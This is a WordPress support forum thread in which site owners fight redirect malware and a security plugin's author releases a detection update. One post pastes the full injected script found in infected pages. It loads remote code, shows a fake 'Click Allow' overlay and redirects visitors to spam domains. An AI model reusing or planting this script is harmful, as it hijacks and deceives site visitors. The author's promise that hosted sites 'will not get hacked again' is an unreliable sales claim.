Home › Forums › Support Forum › Unable to clear redirect malware
Tagged: ellcurvth, redirection
This topic contains 9 replies, has 3 voices, and was last updated by 
-
AuthorPosts
-
October 3, 2019 at 11:30 am #2337
Hi
I’ve run the various scans several times and quarantined 1000s of files. the scans aren’t currently finding anything BUT I am still having issues with my site redirecting to dodgy pages.
Can anyone help? Am I going to have to re-install everything?
October 3, 2019 at 4:47 pm #2338It looks like there is one script leftover, maybe in your theme’s header.php file. If you can send me your header.php file then I will add this new threat to my definition updates.
October 3, 2019 at 7:38 pm #2339Thanks – I’ve emailed you
October 6, 2019 at 6:47 am #2340i have similar issue: pages are redirecting, scan is not picking this up but
malware identified as rogueads.afu?3 by securi
sdk.onPermissionDefault(() => {window.location.replace(“//ellcurvth.com/afu.php?zoneid=2826294″)});
have not as yet completely cleaned the site, i provide services to charity and community orgs in my spare time and they’ve pretty much all been hit with same malwareOctober 6, 2019 at 7:27 am #2341ok so ran a find on all wp files, ie checked all php and js files, then checked keywords in wp database using myphp, and found that all the malware scripts have been added to the page content. This was true for another site i cleaned last week.
here is the embedded script below for your info… oh and i had to deactivate bakery plugin, and use classic mode to edit page in raw/html (for reference sites were running php 7.0 or 1 or 2, they are now all on 7.3, all themes and plugins and wp versions were set to auto update, themes have been popular ones such as avada, betheme, enfold, theGem:
<script>
const overlayTranslations = {"en":{"title":"Attention!","description":"Click “Allow†to subscribe to notifications and continue working with this website."}};
const overlay = {"delay":3000,"overlayStyle":{"background":"rgba(0,0,0, 0.6)"},"title":"Attention!","description":"Click “Allow†to subscribe to notifications and continue working with this website.",...(overlayTranslations[navigator.language.slice(0, 2).toLowerCase()]||Object.values(overlayTranslations)[0])};
const s = document.createElement('script');
s.src='//humsoolt.net/pfe/current/tag.min.js?z=2774009';
s.onload = (sdk) => {
sdk.updateOptions({overlay, overlayTranslations})
sdk.onPermissionDefault(() => {window.location.replace("//ellcurvth.com/afu.php?zoneid=2826294")});
sdk.onPermissionAllowed(() => {window.location.replace("//ellcurvth.com/afu.php?zoneid=2826294")});
sdk.onPermissionDenied(() => {window.location.replace("//ellcurvth.com/afu.php?zoneid=2826294")});
sdk.onAlreadySubscribed(() => {window.location.replace("//ellcurvth.com/afu.php?zoneid=2826294")});
sdk.onNotificationUnsupported(() => {});
}
document.head.appendChild(s);
</script>
<script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type='text/javascript' src='//pl15180773.pvclouds.com/2b/e2/3d/2be23d024eff3a5446e06744968768be.js'></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script>hope this helps
any tips for prevention gladly received
October 6, 2019 at 11:39 am #2342… malware also found in image descriptions, and custom footer, and page/post revisions… sigh (it’s not as if there was no protection on the site)
October 6, 2019 at 9:02 pm #2343I have just released a definition update for this new threat. Please make sure that you have the latest definition updates and run the complete scan again. That should find and fix this threat throughout your database.
October 12, 2019 at 12:29 pm #2346@ELI
Many thanks, even tho i cleaned the database, double checked pages and other content myself, your plugin still found and Fixed 34 occasions that were not picked up by other methods…
A big thank you.!!!
October 23, 2019 at 8:28 am #2348Your plugin is probably now my favourite… and unfortunately it’s getting used quite a lot, as the redirect script is still getting into one of my sites running theGem theme.
site doesn’t have related posts plugin, and I have checked functions.php
Is my next task to reload fresh plugins and a fresh wp? any tips gratefully received.
I have other security plugins running, maybe that’s counter-productive?
Can you drop me a line about your hosting service?
(sorry bombarding you with multiple questions)
October 28, 2019 at 8:22 pm #2360I would hope that you don’t have to completely reload your site from scratch. If you want to send me the URL then I can take a look at it for you.
My plugin should run smoothly in conjunction with other security plugins, although I have had instances come up in the past with some other firewall filters that block my definition updates and even one instance of a firewall rule that blocked my scan page, but you can usually white-list these occurrences or disable the other firewall if it does interfere.
My Super Secure Hosting is available for $12/month per site to those who really need a place where their site will not be reinfected again. I recommend it for sites that are pro to attack or sites that just won’t stay clean on their current server. Once they are hosted on one of my servers they will not get hacked again.
-
AuthorPosts
You must be logged in to reply to this topic.
